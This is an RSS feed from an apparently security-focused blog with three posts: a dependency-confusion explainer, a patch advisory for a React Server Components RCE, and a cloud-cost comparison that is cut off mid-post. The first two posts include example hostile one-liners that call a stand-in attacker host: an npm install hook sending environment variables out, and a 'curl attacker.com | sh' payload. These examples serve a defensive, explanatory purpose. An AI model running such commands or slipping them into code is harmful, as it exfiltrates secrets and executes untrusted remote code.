<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Jacob Alcock - Security & Development]]></title><description><![CDATA[Jacob Alcock - Security & Development]]></description><link>https://blog.jacobalcock.co.uk</link><image><url>https://cdn.hashnode.com/res/hashnode/image/upload/v1762469624729/0e37fdd0-5768-46d6-ad25-dcf8553f5519.png</url><title>Jacob Alcock - Security &amp; Development</title><link>https://blog.jacobalcock.co.uk</link></image><generator>RSS for Node</generator><lastBuildDate>Wed, 15 Apr 2026 17:53:30 GMT</lastBuildDate><atom:link href="https://blog.jacobalcock.co.uk/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Dependency Confusion Attacks: How Package Names Steal Your Code]]></title><description><![CDATA[Dependency confusion attacks happen because package managers default to checking public registries, even when you're using private packages. Attackers upload malicious code with internal package names. Your CI/CD pulls and executes attacker code.
The...]]></description><link>https://blog.jacobalcock.co.uk/dependency-confusion-attacks-how-package-names-steal-your-code</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/dependency-confusion-attacks-how-package-names-steal-your-code</guid><category><![CDATA[cybersecurity]]></category><category><![CDATA[Devops]]></category><category><![CDATA[Developer]]></category><category><![CDATA[npm]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Tue, 06 Jan 2026 10:27:15 GMT</pubDate><content:encoded><![CDATA[<p>Dependency confusion attacks happen because package managers default to checking public registries, even when you're using private packages. Attackers upload malicious code with internal package names. Your CI/CD pulls and executes attacker code.</p>
<p>The fix is simple: configure package managers correctly. Most companies don't.</p>
<h1 id="heading-how-dependency-confusion-works"><strong>How Dependency Confusion Works</strong></h1>
<p><strong>Step 1: Company uses internal packages</strong></p>
<p>Company has private npm packages for shared code:</p>
<ul>
<li><p><code>@mycompany/auth</code></p>
</li>
<li><p><code>@mycompany/api-client</code></p>
</li>
<li><p><code>@mycompany/utils</code></p>
</li>
</ul>
<p>These live in a private npm registry (JFrog Artifactory, npm Enterprise, AWS CodeArtifact).</p>
<p><strong>Step 2: Developer configuration</strong></p>
<p><code>package.json</code>:</p>
<pre><code class="lang-plaintext">{
  "dependencies": {
    "@mycompany/auth": "^1.2.3",
    "express": "^4.18.0"
  }
}
</code></pre>
<p><strong>Step 3: Attacker discovers internal package names</strong></p>
<p>Via:</p>
<ul>
<li><p>Leaked <code>package.json</code> in public GitHub repos</p>
</li>
<li><p>Error messages mentioning package names</p>
</li>
<li><p>Former employees disclosing names</p>
</li>
<li><p>Social engineering</p>
</li>
</ul>
<p><strong>Step 4: Attacker publishes to public npm</strong></p>
<p>Attacker creates <code>@mycompany/auth</code> on public npm with version <code>999.999.999</code>.</p>
<p><strong>Step 5: Package manager downloads attacker's package</strong></p>
<p>npm (without proper configuration) checks public registry. Finds <code>@mycompany/auth@999.999.999</code> (higher version than internal <code>1.2.3</code>). Downloads and installs malicious package.</p>
<p><strong>Step 6: Code execution</strong></p>
<p>Package has <code>install</code> script:</p>
<pre><code class="lang-plaintext">{
  "scripts": {
    "install": "curl https://attacker.com/steal?data=$(env)"
  }
}
</code></pre>
<p>On <code>npm install</code>, this executes. Attacker gets:</p>
<ul>
<li><p>Environment variables (API keys, tokens, credentials)</p>
</li>
<li><p>Source code access (if running in CI/CD)</p>
</li>
<li><p>Network access to internal systems</p>
</li>
</ul>
<h1 id="heading-alex-birsan-research"><strong>Alex Birsan Research</strong></h1>
<p>Alex Birsan demonstrated this attack in 2021, earning $130k in bug bounties.</p>
<p><strong>Targets</strong>: Over 35 companies including Apple, Microsoft, Netflix, Yelp, Tesla</p>
<p><strong>Method</strong>:</p>
<ol>
<li><p>Identified internal package names from public sources</p>
</li>
<li><p>Published packages to public npm/PyPI with same names</p>
</li>
<li><p>Used high version numbers (999.999.999) to ensure precedence</p>
</li>
<li><p>Added telemetry to track installations</p>
</li>
<li><p>Reported to affected companies</p>
</li>
</ol>
<p><strong>Results</strong>:</p>
<ul>
<li><p>Thousands of downloads from major tech companies</p>
</li>
<li><p>Code executed in CI/CD pipelines</p>
</li>
<li><p>Access to internal networks, credentials, source code</p>
</li>
<li><p>$130k in bounty payouts</p>
</li>
</ul>
<p>This wasn't a sophisticated exploit. It was package manager configuration doing exactly what it was told to do - just not what companies intended.</p>
<h1 id="heading-why-package-managers-do-this"><strong>Why Package Managers Do This</strong></h1>
<p><strong>npm behavior</strong>:</p>
<pre><code class="lang-plaintext">npm install @mycompany/auth
</code></pre>
<p>npm checks (in order):</p>
<ol>
<li><p>Local cache</p>
</li>
<li><p>Configured registries</p>
</li>
<li><p>Public npm registry (default)</p>
</li>
</ol>
<p>If <code>@mycompany/auth</code> exists in public npm with a higher version than private registry, npm installs the public version.</p>
<p><strong>pip behavior</strong> (Python):</p>
<pre><code class="lang-plaintext">pip install company-internal-package
</code></pre>
<p>pip checks configured repositories. If not found, checks PyPI. If both have the package, highest version wins.</p>
<p><strong>RubyGems, Maven, NuGet</strong>: Similar behavior. Public registries are default or fallback.</p>
<p>This isn't a bug. It's designed behavior. The problem is companies don't configure registry precedence correctly.</p>
<h1 id="heading-why-this-persists"><strong>Why This Persists</strong></h1>
<p><strong>Default configurations are insecure</strong></p>
<p>Out of the box, package managers check public registries. Developers must explicitly configure private registry precedence.</p>
<p>Most don't.</p>
<p><strong>No namespace protection</strong></p>
<p>Anyone can publish <code>@yourcompany/package-name</code> to public npm. Package managers don't verify ownership.</p>
<p>npm scopes (<code>@scopename</code>) don't provide security. They're just namespaces. Attackers can create packages within any scope.</p>
<p><strong>Version number precedence</strong></p>
<p>Package managers use semantic versioning. <code>999.999.999</code> beats <code>1.2.3</code>.</p>
<p>Attackers exploit this by publishing absurdly high version numbers.</p>
<p><strong>Lack of awareness</strong></p>
<p>Developers don't understand package manager resolution order. They assume "we use a private registry" means package managers won't check public registries.</p>
<p>Wrong.</p>
<p><strong>CI/CD inherits developer configurations</strong></p>
<p>Developer machine might be configured correctly. CI/CD pipeline uses a generic Docker image with default npm config.</p>
<p>CI/CD pulls from public registry. Attacker code executes in pipeline with access to production credentials.</p>
<p><strong>No auditing</strong></p>
<p>Companies don't monitor which registries packages are downloaded from. Malicious packages get installed without detection.</p>
<h1 id="heading-attack-scenarios"><strong>Attack Scenarios</strong></h1>
<p><strong>Scenario 1: CI/CD credential theft</strong></p>
<p>Company uses <code>@mycompany/deploy-utils</code> for deployment scripts. Package has access to AWS credentials in environment variables.</p>
<p>Attacker publishes malicious <code>@mycompany/deploy-utils</code> to public npm. CI/CD pipeline installs it. <code>postinstall</code> script exfiltrates AWS credentials to attacker server.</p>
<p>Attacker has production AWS access.</p>
<p><strong>Scenario 2: Source code exfiltration</strong></p>
<p>Internal package <code>@company/build-tools</code> runs during build. Has access to entire source code.</p>
<p>Attacker publishes malicious version. Build process installs it. Package uploads source code to attacker server.</p>
<p>Company IP is stolen.</p>
<p><strong>Scenario 3: Backdoor deployment</strong></p>
<p>Package <code>@company/auth-middleware</code> is used in production applications.</p>
<p>Attacker publishes malicious version with backdoor. Next deployment pulls attacker package. Backdoor ships to production.</p>
<p>Production compromised.</p>
<h1 id="heading-npm-scope"><strong>npm Scope</strong></h1>
<p>npm scopes like <code>@mycompany</code> seem like they provide isolation. They don't.</p>
<pre><code class="lang-plaintext">npm install @mycompany/auth
</code></pre>
<p>This will install from public npm if that package exists there, regardless of whether you have a private registry with the same package.</p>
<p><strong>The fix</strong>:</p>
<p><code>.npmrc</code>:</p>
<pre><code class="lang-plaintext">@mycompany:registry=https://private-registry.company.com
</code></pre>
<p>This tells npm: "For packages in <code>@mycompany</code> scope, only use this registry."</p>
<p>Most companies don't configure this.</p>
<h1 id="heading-pips-problem"><strong>pip’s Problem</strong></h1>
<p>Python's <code>pip</code> has similar issues with PyPI.</p>
<p><strong>Attack</strong>:</p>
<pre><code class="lang-plaintext">pip install company-internal-utils
</code></pre>
<p>If <code>company-internal-utils</code> exists on both private repository and PyPI, pip might install from PyPI depending on configuration.</p>
<p><strong>The fix</strong>:</p>
<p><code>pip.conf</code>:</p>
<pre><code class="lang-plaintext">[global]
index-url = https://private-repo.company.com/simple/
</code></pre>
<p>Or use <code>--index-url</code> flag explicitly.</p>
<p>Again, most companies rely on default behavior.</p>
<h1 id="heading-detection"><strong>Detection</strong></h1>
<p><strong>How do you know if you're vulnerable?</strong></p>
<ol>
<li><p>Do you use internal packages?</p>
</li>
<li><p>Are those package names secret or publicly known?</p>
</li>
<li><p>Is your package manager configured to prioritise private registry?</p>
</li>
<li><p>Are CI/CD pipelines configured the same as developer machines?</p>
</li>
</ol>
<p>If you answer "I don't know" to any of these, you're probably vulnerable.</p>
<p><strong>Monitoring</strong>:</p>
<p>Check where packages are downloaded from:</p>
<pre><code class="lang-plaintext">npm config get registry
</code></pre>
<p>Audit installed packages against expected sources. But this requires tooling most companies don't have.</p>
<h1 id="heading-final-thoughts"><strong>Final Thoughts</strong></h1>
<p>Dependency confusion is a simple attack with devastating impact. It exploits default package manager behavior that most developers don't understand.</p>
<p>The fix is trivial: configure registry precedence correctly. Most companies don't because:</p>
<ul>
<li><p>Complexity</p>
</li>
<li><p>Lack of awareness</p>
</li>
<li><p>No ownership</p>
</li>
<li><p>Works until it doesn't</p>
</li>
</ul>
<p>Alex Birsan made $130k in bounties demonstrating this. How many attackers have exploited it without disclosing?</p>
<p>You're probably vulnerable right now. Your build pipelines are likely pulling packages from public registries without verification.</p>
<p>Check your <code>.npmrc</code>. If you don't have scope restrictions configured, you're one package name discovery away from being compromised.</p>
<p>The supply chain attack surface is massive. Dependency confusion is one of the easiest exploits.</p>
<p>Fix your package manager configs. Before someone else publishes <code>@yourcompany/auth-utils</code> to public npm.</p>
]]></content:encoded></item><item><title><![CDATA[Critical Vulnerability in React Server Components (CVE-2025-55182)]]></title><description><![CDATA[UPDATE: December 3, 2025 - A critical pre-authentication Remote Code Execution (RCE) vulnerability has been disclosed in React Server Components. This is a CVSS 10.0 vulnerability. If you're running Next.js 15.x, 16.x, or React 19.x in production, st...]]></description><link>https://blog.jacobalcock.co.uk/critical-vulnerability-in-react-server-components-cve-2025-55182</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/critical-vulnerability-in-react-server-components-cve-2025-55182</guid><category><![CDATA[React]]></category><category><![CDATA[Security]]></category><category><![CDATA[Next.js]]></category><category><![CDATA[CVE]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Wed, 03 Dec 2025 00:00:00 GMT</pubDate><content:encoded><![CDATA[<p><strong>UPDATE: December 3, 2025</strong> - A critical pre-authentication Remote Code Execution (RCE) vulnerability has been disclosed in React Server Components. This is a <strong>CVSS 10.0</strong> vulnerability. If you're running Next.js 15.x, 16.x, or React 19.x in production, <strong>stop reading and patch immediately</strong>.</p>
<h2 id="heading-the-issue">The Issue</h2>
<p><strong>Affected:</strong></p>
<ul>
<li><p>React 19.0.0, 19.1.0, 19.1.1, 19.2.0</p>
</li>
<li><p>Next.js 15.x and 16.x (all versions using App Router)</p>
</li>
<li><p>Experimental canary releases starting with Next.js 14.3.0-canary.77</p>
</li>
</ul>
<p><strong>Patched versions:</strong></p>
<ul>
<li><p><strong>React:</strong> 19.0.1, 19.1.2, 19.2.1</p>
</li>
<li><p><strong>Next.js:</strong> 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7</p>
</li>
</ul>
<p><strong>Vulnerability:</strong> Pre-authentication remote code execution via unsafe deserialisation in Server Function endpoints</p>
<p><strong>CVSS Score:</strong> 10.0 (Critical)</p>
<p><strong>CVE ID:</strong> CVE-2025-55182 (React), CVE-2025-66478 (Next.js)</p>
<h2 id="heading-how-to-update">How to Update</h2>
<h3 id="heading-if-youre-using-nextjs">If you're using Next.js:</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># Check your current version</span>
npm list next

<span class="hljs-comment"># Update to the latest patched version for your major version</span>
npm install next@15.5.7  <span class="hljs-comment"># For Next.js 15.x</span>
npm install next@16.0.7  <span class="hljs-comment"># For Next.js 16.x</span>

<span class="hljs-comment"># Verify the update</span>
npm list next
</code></pre>
<h3 id="heading-if-youre-using-react-directly-with-server-components">If you're using React directly with Server Components:</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># Update to patched React versions</span>
npm install react@19.2.1 react-dom@19.2.1

<span class="hljs-comment"># Also update the affected server packages</span>
npm install react-server-dom-webpack@19.2.1
npm install react-server-dom-turbopack@19.2.1
npm install react-server-dom-parcel@19.2.1
</code></pre>
<h3 id="heading-if-youre-on-nextjs-143-canary-builds">If you're on Next.js 14.3 canary builds:</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># Either downgrade to stable 14.x</span>
npm install next@14.2.18

<span class="hljs-comment"># Or downgrade to 14.3.0-canary.76 (last safe canary)</span>
npm install next@14.3.0-canary.76

<span class="hljs-comment"># Or upgrade to a patched 15.x/16.x version</span>
npm install next@15.5.7
</code></pre>
<p><strong>After updating, redeploy immediately.</strong> This isn't a "next deploy cycle" patch.</p>
<h2 id="heading-what-happened">What Happened?</h2>
<p>React Server Components introduced a new attack surface: <strong>Server Functions</strong> (also called Server Actions in Next.js). These are functions you can call from the client that execute on the server.</p>
<p>Here's the simplified architecture:</p>
<pre><code class="lang-jsx"><span class="hljs-comment">// app/actions.js</span>
<span class="hljs-string">'use server'</span>

<span class="hljs-keyword">export</span> <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">saveData</span>(<span class="hljs-params">formData</span>) </span>{
  <span class="hljs-comment">// This runs on the SERVER</span>
  <span class="hljs-keyword">const</span> data = formData.get(<span class="hljs-string">'data'</span>);
  <span class="hljs-keyword">await</span> db.save(data);
}
</code></pre>
<pre><code class="lang-jsx"><span class="hljs-comment">// app/page.js</span>
<span class="hljs-string">'use client'</span>

<span class="hljs-keyword">import</span> { saveData } <span class="hljs-keyword">from</span> <span class="hljs-string">'./actions'</span>

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Page</span>(<span class="hljs-params"></span>) </span>{
  <span class="hljs-keyword">return</span> (
    <span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">form</span> <span class="hljs-attr">action</span>=<span class="hljs-string">{saveData}</span>&gt;</span>
      <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">name</span>=<span class="hljs-string">"data"</span> /&gt;</span>
      <span class="hljs-tag">&lt;<span class="hljs-name">button</span>&gt;</span>Save<span class="hljs-tag">&lt;/<span class="hljs-name">button</span>&gt;</span>
    <span class="hljs-tag">&lt;/<span class="hljs-name">form</span>&gt;</span></span>
  )
}
</code></pre>
<p>When the user submits the form, the client sends an HTTP POST request to a special endpoint on your Next.js server. The server deserialises the request payload and executes the <code>saveData</code> function.</p>
<h2 id="heading-the-vulnerability"><strong>The Vulnerability</strong></h2>
<p>The deserialisation process in React 19.0.0–19.2.0 <strong>unsafely deserialises untrusted HTTP payloads</strong> without proper validation.</p>
<p>An attacker can craft a malicious payload that, when deserialised, executes arbitrary code on your server.</p>
<h2 id="heading-why-this-is-a-100-cvss-the-worst-possible-score">Why This Is a 10.0 CVSS (The Worst Possible Score)</h2>
<p>CVSS 10.0 requires meeting these criteria:</p>
<ul>
<li><p>✅ <strong>Attack Vector: Network (AV:N)</strong> - Exploitable remotely over HTTP</p>
</li>
<li><p>✅ <strong>Attack Complexity: Low (AC:L)</strong> - No special conditions required</p>
</li>
<li><p>✅ <strong>Privileges Required: None (PR:N)</strong> - No authentication needed (pre-auth RCE)</p>
</li>
<li><p>✅ <strong>User Interaction: None (UI:N)</strong> - Fully automated attack</p>
</li>
<li><p>✅ <strong>Scope: Changed (S:C)</strong> - Can compromise beyond the vulnerable component</p>
</li>
<li><p>✅ <strong>Confidentiality Impact: High (C:H)</strong> - Full data exfiltration possible</p>
</li>
<li><p>✅ <strong>Integrity Impact: High (I:H)</strong> - Full system compromise possible</p>
</li>
<li><p>✅ <strong>Availability Impact: High (A:H)</strong> - Complete denial of service possible</p>
</li>
</ul>
<p>An unauthenticated attacker can send <strong>a single HTTP request</strong> to your publicly accessible Next.js application and <strong>execute arbitrary code</strong> on your server. They can:</p>
<ul>
<li><p>Read environment variables (API keys, database credentials, secrets)</p>
</li>
<li><p>Execute system commands</p>
</li>
<li><p>Install backdoors</p>
</li>
<li><p>Exfiltrate your entire database</p>
</li>
<li><p>Pivot to other services on your network</p>
</li>
<li><p>Mine cryptocurrency</p>
</li>
<li><p>Ransom your data</p>
</li>
</ul>
<p>And they can do all of this <strong>without needing an account or any interaction from your users</strong>.</p>
<p>This is as bad as it gets.</p>
<h2 id="heading-how-the-exploit-works">How the Exploit Works</h2>
<h3 id="heading-the-vulnerable-code-path">The Vulnerable Code Path</h3>
<p>React Server Components serialise function arguments and return values using a custom serializstion format. When you call a Server Function from the client:</p>
<ol>
<li><p>Client serialises the arguments into a special payload format</p>
</li>
<li><p>Client sends HTTP POST to <code>/_next/data/...</code> (Next.js) or your Server Function endpoint</p>
</li>
<li><p><strong>Server deserialises the payload</strong> ← THE VULNERABILITY IS HERE</p>
</li>
<li><p>Server executes the function with the deserialised arguments</p>
</li>
<li><p>Server serialises the return value and sends it back</p>
</li>
</ol>
<p>The vulnerability is in <strong>step 3</strong>. The affected React packages (<code>react-server-dom-webpack</code>, <code>react-server-dom-turbopack</code>, <code>react-server-dom-parcel</code>) deserialise the incoming payload without properly validating the data structure.</p>
<h3 id="heading-deserialisation-vulnerabilities">Deserialisation Vulnerabilities</h3>
<p>Unsafe deserialisation is <strong>CWE-502</strong>, one of the most dangerous vulnerability classes in web security. Here's why:</p>
<p>When you deserialise data, you're reconstructing an object from a serialised representation. If the deserialiser doesn't validate the structure, an attacker can craft a payload that:</p>
<ol>
<li><p>Instantiates dangerous classes</p>
</li>
<li><p>Calls methods during object construction</p>
</li>
<li><p>Triggers code execution through property setters or getters</p>
</li>
<li><p>Exploits prototype pollution (in JavaScript)</p>
</li>
</ol>
<p><strong>Classic example (simplified):</strong></p>
<pre><code class="lang-javascript"><span class="hljs-comment">// Unsafe deserialization</span>
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">deserialize</span>(<span class="hljs-params">payload</span>) </span>{
  <span class="hljs-keyword">return</span> <span class="hljs-built_in">eval</span>(<span class="hljs-string">'('</span> + payload + <span class="hljs-string">')'</span>);  
}

<span class="hljs-comment">// Attacker sends:</span>
deserialize(<span class="hljs-string">"({toString: () =&gt; require('child_process').exec('curl attacker.com | sh')})"</span>)
</code></pre>
<p>The React vulnerability is more sophisticated than <code>eval()</code>, but the principle is the same. <strong>Untrusted input is used to construct code or objects without validation</strong>.</p>
<h3 id="heading-why-server-functions-are-high-risk-targets">Why Server Functions Are High-Risk Targets</h3>
<p>Server Functions are attractive targets because:</p>
<ol>
<li><p><strong>Public endpoints:</strong> They're automatically exposed as HTTP endpoints</p>
</li>
<li><p><strong>No built-in rate limiting:</strong> Easy to brute-force or DoS</p>
</li>
<li><p><strong>Direct server access:</strong> Code executes in the same process as your app</p>
</li>
<li><p><strong>Environment variable access:</strong> Can read <code>process.env</code> immediately</p>
</li>
<li><p><strong>No WAF signatures:</strong> This is a new attack surface with no existing WAF rules</p>
</li>
</ol>
<p>If you're using Server Functions for authentication, database writes, or API calls, an attacker can:</p>
<ul>
<li><p>Bypass authentication by calling the function directly</p>
</li>
<li><p>Inject malicious data into your database</p>
</li>
<li><p>Abuse your API keys to attack third-party services</p>
</li>
</ul>
<h2 id="heading-who-is-affected">Who Is Affected?</h2>
<h3 id="heading-you-are-affected-if">You ARE affected if:</h3>
<ul>
<li><p>You're running <strong>Next.js 15.x or 16.x</strong> in production (any version)</p>
</li>
<li><p>You're running <strong>Next.js 14.3.0-canary.77 or later</strong> canary builds</p>
</li>
<li><p>You're using <strong>React 19</strong> with a custom Server Components setup (Remix, Waku, etc.)</p>
</li>
<li><p>You're using the <strong>App Router</strong> in Next.js (the vulnerability is in Server Functions, which are App Router only)</p>
</li>
</ul>
<h3 id="heading-you-are-not-affected-if">You are NOT affected if:</h3>
<ul>
<li><p>You're on <strong>Next.js 14.x stable</strong> (14.0.0 through 14.2.x)</p>
</li>
<li><p>You're on <strong>Next.js 13.x or earlier</strong></p>
</li>
<li><p>You're using <strong>React 18 or earlier</strong></p>
</li>
<li><p>You're using <strong>Pages Router only</strong> (no App Router, no Server Components)</p>
</li>
<li><p>You're using <strong>React 19 with RSC but none of the affected bundlers</strong> (unlikely)</p>
</li>
</ul>
<h2 id="heading-why-this-vulnerability-existed">Why This Vulnerability Existed</h2>
<p>Server Components are <strong>brand new</strong>. React 19 was released in December 2024 (stable) after years in alpha/beta. Next.js 15 shipped in October 2024.</p>
<p>The React team built a novel serialisation protocol to handle:</p>
<ul>
<li><p>Client-to-server function calls</p>
</li>
<li><p>Server-to-client streaming of RSC payloads</p>
</li>
<li><p>Promises, symbols, and complex object graphs</p>
</li>
<li><p>References between client and server</p>
</li>
</ul>
<p>This is <strong>hard</strong>. Really hard. And the security implications weren't fully understood when the feature shipped.</p>
<p><strong>This is not a criticism of the React team.</strong> They responsibly disclosed the vulnerability, shipped patches quickly, and published detailed advisories. This is how responsible disclosure should work.</p>
<p>But it's a reminder: <strong>new features = new attack surface</strong>.</p>
<h2 id="heading-what-nextjs-and-react-could-have-done-better">What Next.js and React Could Have Done Better</h2>
<p><strong>(This is a learning opportunity, not an attack on the teams involved.)</strong></p>
<h3 id="heading-1-server-functions-should-have-been-opt-in">1. Server Functions Should Have Been Opt-In</h3>
<p>Server Functions are <strong>on by default</strong> if you use <code>'use server'</code>. This means every Next.js 15+ App Router application has this attack surface, even if developers don't realize it.</p>
<p><strong>Better approach:</strong></p>
<pre><code class="lang-javascript"><span class="hljs-comment">// next.config.js</span>
<span class="hljs-built_in">module</span>.exports = {
  <span class="hljs-attr">experimental</span>: {
    <span class="hljs-attr">serverActions</span>: <span class="hljs-literal">true</span>  <span class="hljs-comment">// Opt-in</span>
  }
}
</code></pre>
<p>Make dangerous features opt-in, not opt-out.</p>
<h3 id="heading-2-rate-limiting-should-be-built-in">2. Rate Limiting Should Be Built-In</h3>
<p>There's no built-in rate limiting for Server Functions. An attacker can make thousands of requests per second trying different payloads.</p>
<p><strong>Recommended:</strong></p>
<ul>
<li><p>Default rate limit: 100 requests/minute per IP</p>
</li>
<li><p>Configurable in <code>next.config.js</code></p>
</li>
<li><p>Automatically enabled for all Server Functions</p>
</li>
</ul>
<h3 id="heading-3-content-security-policy-for-server-function-payloads">3. Content Security Policy for Server Function Payloads</h3>
<p>The server should validate the <code>Content-Type</code> and payload structure before deserializing.</p>
<p><strong>Example:</strong></p>
<pre><code class="lang-javascript"><span class="hljs-comment">// Validate before deserializing</span>
<span class="hljs-keyword">if</span> (req.headers[<span class="hljs-string">'content-type'</span>] !== <span class="hljs-string">'application/x-server-function'</span>) {
  <span class="hljs-keyword">return</span> res.status(<span class="hljs-number">400</span>).send(<span class="hljs-string">'Invalid content type'</span>);
}

<span class="hljs-keyword">if</span> (payload.length &gt; MAX_PAYLOAD_SIZE) {
  <span class="hljs-keyword">return</span> res.status(<span class="hljs-number">413</span>).send(<span class="hljs-string">'Payload too large'</span>);
}
</code></pre>
<h3 id="heading-4-security-docs-should-be-prominent">4. Security Docs Should Be Prominent</h3>
<p>The Next.js documentation should have a <strong>Security</strong> section that covers:</p>
<ul>
<li><p>Server Functions are public HTTP endpoints</p>
</li>
<li><p>Input validation is required</p>
</li>
<li><p>Authentication is not automatic</p>
</li>
<li><p>Rate limiting is your responsibility</p>
</li>
</ul>
<p>This information exists but is buried. It should be in the main Server Functions guide.</p>
<h2 id="heading-final-thoughts">Final Thoughts</h2>
<p>Server Components are powerful. They enable features that were impossible or impractical before:</p>
<ul>
<li><p>True server-client composition</p>
</li>
<li><p>Streaming HTML</p>
</li>
<li><p>Zero-bundle components</p>
</li>
<li><p>Direct database access from components</p>
</li>
</ul>
<p>But <strong>power comes with responsibility</strong>. The security model of React fundamentally changed with Server Components, and the ecosystem is still learning the implications.</p>
<p><strong>If you take one thing away from this article:</strong> Update to the patched versions <strong>immediately</strong>. This is a pre-auth RCE with a 10.0 CVSS score. Attackers are scanning for vulnerable Next.js apps right now.</p>
<p>Don't be the next breach headline.</p>
<p><strong>Official advisories:</strong></p>
<ul>
<li><p><a target="_blank" href="https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components">React Security Advisory (CVE-2025-55182)</a></p>
</li>
<li><p><a target="_blank" href="https://www.facebook.com/security/advisories/cve-2025-55182">Meta Security Advisory</a></p>
</li>
<li><p><a target="_blank" href="https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp">Next.js Security Advisory (GHSA-9qr9-h5gf-34mp)</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Cloud Costs Are Destroying Startup Margins]]></title><description><![CDATA[AWS bills that exceed engineering salaries are normal now. Startups with 100,000 users paying $50,000/month for infrastructure that could run on a $200/month dedicated server.
Cloud infrastructure is convenient. It's also absurdly expensive once you ...]]></description><link>https://blog.jacobalcock.co.uk/cloud-costs-are-destroying-startup-margins</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/cloud-costs-are-destroying-startup-margins</guid><category><![CDATA[Cloud Computing]]></category><category><![CDATA[Cloud]]></category><category><![CDATA[cost-optimisation]]></category><category><![CDATA[software development]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Sat, 29 Nov 2025 13:02:03 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/9BJRGlqoIUk/upload/fe62a87a184c92a637d7a81be59d1d78.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>AWS bills that exceed engineering salaries are normal now. Startups with 100,000 users paying $50,000/month for infrastructure that could run on a $200/month dedicated server.</p>
<p>Cloud infrastructure is convenient. It's also absurdly expensive once you move beyond toy projects. And the costs compound in ways that aren't obvious until you're locked in.</p>
<h1 id="heading-the-real-cost-comparison">The Real Cost Comparison</h1>
<p><strong>Scenario</strong>: A typical SaaS startup with 100k users, ~500GB database, moderate traffic</p>
<p><strong>AWS</strong>:</p>
<ul>
<li><p>RDS (db.r5.xlarge): $500/month</p>
</li>
<li><p>EC2 instances (3x m5.large for redundancy): $450/month</p>
</li>
<li><p>Load balancer: $25/month</p>
</li>
<li><p>Data transfer out: $500-2,000/month (depending on traffic)</p>
</li>
<li><p>S3 storage and requests: $200/month</p>
</li>
<li><p>CloudFront: $100/month</p>
</li>
<li><p>Backups, snapshots, logs: $150/month</p>
</li>
<li><p>Monitoring, alerts: $50/month</p>
</li>
</ul>
<p><strong>Monthly total</strong>: $2,000-3,500/month</p>
<p><strong>Hetzner dedicated server</strong> (AX102):</p>
<ul>
<li><p>CPU: AMD Ryzen 9 7950X (16 cores)</p>
</li>
<li><p>RAM: 128GB</p>
</li>
<li><p>Storage: 2x 3.84TB NVMe SSD</p>
</li>
<li><p>Bandwidth: Unlimited at 1Gbit/s</p>
</li>
</ul>
<p><strong>Monthly total</strong>: €200 (~$220/month)</p>
<p>The AWS bill is <strong>10-15x higher</strong> for comparable resources. And that's before costs balloon with scale.</p>
<h1 id="heading-hidden-costs">Hidden Costs</h1>
<p>Cloud vendors bury costs in fees most startups don't anticipate.</p>
<p><strong>Data transfer (egress) fees</strong></p>
<p>AWS charges $0.09/GB for data transfer out. Seems small until you do the math:</p>
<ul>
<li><p>100k daily active users</p>
</li>
<li><p>Average 5MB per session</p>
</li>
<li><p>500GB/day = 15TB/month</p>
</li>
<li><p>15TB × $0.09 = <strong>$1,350/month just for bandwidth</strong></p>
</li>
</ul>
<p>Hetzner: Included. No egress fees.</p>
<p><strong>Cross-region transfer</strong></p>
<p>Moving data between AWS regions costs $0.02/GB. If your database is in us-east-1 and your app servers are in us-west-2, every query costs money.</p>
<p><strong>NAT Gateway</strong></p>
<p>Need private subnets to access the internet? $0.045/GB processed + $0.045/hour. Easily $50-100/month for basic usage.</p>
<p><strong>Load balancer fees</strong></p>
<p>Application Load Balancer: $0.0225/hour + $0.008/LCU. Minimum ~$16/month, realistically $25-50/month.</p>
<p><strong>Reserved instances trap</strong></p>
<p>"Save 30-60% by committing to reserved instances!"</p>
<p>You commit to 1-3 year contracts. Your usage patterns change. You're stuck paying for resources you don't need while also paying for the resources you actually use.</p>
<p><strong>Support fees</strong></p>
<p>Basic support: Free (but useless, 24-hour response time for production issues) Developer: $29/month minimum or 3% of AWS bill Business: $100/month or 10% of AWS bill (minimum for 1-hour response)</p>
<p>If your monthly bill is $10,000, business support costs $1,000/month on top of that.</p>
<h1 id="heading-compounding-cost">Compounding Cost</h1>
<p>Cloud costs don't scale linearly. They compound.</p>
<p><strong>Example progression</strong>:</p>
<p><strong>Month 1-6 (MVP)</strong>: $200/month - single small instance, small database <strong>Month 7-12 (early traction)</strong>: $800/month - added load balancer, bigger database, redundancy <strong>Month 13-18 (growing)</strong>: $3,500/month - multi-region, CDN, caching layer, monitoring <strong>Month 19-24 (scaling)</strong>: $15,000/month - auto-scaling, managed services, increased traffic <strong>Month 25+ (mature)</strong>: $50,000+/month - everything costs more at scale</p>
<p>Revenue might grow 10x. Infrastructure costs grow 250x.</p>
<h1 id="heading-why-startups-use-cloud-anyway">Why Startups Use Cloud Anyway</h1>
<p>If cloud is so expensive, why does everyone use it?</p>
<p><strong>Speed to market</strong></p>
